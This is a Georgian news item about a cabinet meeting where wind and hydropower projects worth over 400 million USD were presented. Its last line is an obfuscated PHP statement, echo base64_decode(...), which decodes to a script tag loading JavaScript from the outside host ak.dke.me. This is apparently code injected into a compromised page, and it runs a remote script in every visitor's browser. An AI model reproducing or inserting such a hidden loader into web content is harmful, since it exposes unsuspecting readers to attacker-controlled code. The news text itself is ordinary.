celsiusi
ავერსი საქკაბელი

საქართველოს მთავრობის ადმინისტრაციის ცნობით, მინისტრთა კაბინეტის დღეს გამართულ სხდომაზე წარდგენილი ენერგეტიკული პროექტების ჯამური ინვესტიცია 400 მლნ დოლარს შეადგენს.

უწყების ცნობით, პრემიერ-მინისტრ ირაკლი ღარიბაშვილის ხელმძღვანელობით მინისტრთა კაბინეტის წევრებმა დღის წესრიგით გათვალისწინებული 16 საკითხი განიხილეს.

განსახილველ საკითხთა შორის იყო ეკონომიკის სამინისტროს მიერ ინიცირებული სამი ქარისა და ხუთი ჰიდროელექტროსადგურის პროექტი, რომელთა განხორციელებაც საქართველოს სხვადასხვა რეგიონში, მათ შორის − სამცხე-ჯავახეთში, კახეთში, შიდა ქართლსა და იმერეთში იგეგმება.

„მთავრობის სხდომაზე წარდგენილი ენერგეტიკული პროექტების დადგმული სიმძლავრე ჯამურად 250 მგვტ-ზე მეტია, ხოლო ჯამური ინვესტიცია 400 მლნ აშშ დოლარს აჭარბებს.

აღნიშნული ელექტროსადგურების ინვესტორ კომპანიებთან შესაბამისი ხელშეკრულებები გაფორმდება, რომელთა საფუძველზეც დაიწყება პროექტების ტექნიკურ - ეკონომიკური განხორციელებადობის საკითხთა შესწავლა, ასევე სამშენებლო სამუშაოები“, - ნათქვამია მთავრობის ადმინისტრაციის მიერ გავრცელებულ ინფორმაციაში.

210
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");